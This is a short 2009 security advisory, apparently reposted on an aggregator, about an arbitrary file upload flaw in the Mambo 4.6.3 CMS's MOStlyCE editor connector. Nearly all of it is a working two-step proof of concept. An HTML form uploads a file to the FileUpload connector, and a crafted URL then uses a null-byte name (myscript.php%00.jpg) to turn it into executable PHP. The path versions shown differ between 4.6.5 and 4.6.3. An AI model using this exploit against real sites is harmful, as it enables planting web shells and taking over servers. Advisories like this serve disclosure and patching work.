Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22489
HistorySep 21, 2009 - 12:00 a.m.

Mambo 4.6.3 arbitrary file upload

2009-09-2100:00:00
vulners.com
80

Step 1) Using post method send file to:

http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload

file should have one of the following extensions:
zip, doc, xls, pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla

POC:
<form action="http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&quot;
method="post" enctype="multipart/form-data">
<input type="file" name="NewFile"></input>
<input type="submit" value="submit"></input>
</form>

Step 2) Using known bug in this version of mambo rename that file.

POC:
http://victim.com/mambo4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&amp;file=a&amp;file[NewFile][name]=myscript.php&#37;00.jpg&amp;file[NewFile][tmp_name]=/home/victim/victim.com/UserFiles/File/abc.gif&amp;file[NewFile][size]=1&amp;CurrentFolder=

path to "UserFiles" you can get using another known bug which is
described here:
http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded